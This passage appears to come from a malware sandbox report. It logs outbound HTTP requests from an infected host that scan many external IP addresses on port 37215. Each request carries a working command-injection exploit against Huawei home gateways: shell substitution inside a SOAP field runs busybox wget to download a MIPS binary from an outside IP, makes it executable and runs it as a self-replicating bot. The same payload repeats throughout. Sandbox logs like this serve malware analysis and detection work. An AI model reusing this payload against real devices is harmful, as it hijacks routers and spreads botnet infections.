                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1710192.168.2.1360568157.247.68.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617609024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1711192.168.2.1359882157.84.225.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617629051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1712192.168.2.134817860.43.224.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617654085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1713192.168.2.1342346197.129.146.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617679119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1714192.168.2.1360076219.194.191.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617691040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1715192.168.2.1351642170.130.227.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617724895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1716192.168.2.133606441.181.189.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617727041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1717192.168.2.1342304197.124.46.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617737055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1718192.168.2.1335732157.85.210.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617773056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1719192.168.2.1338034197.13.94.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617984056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
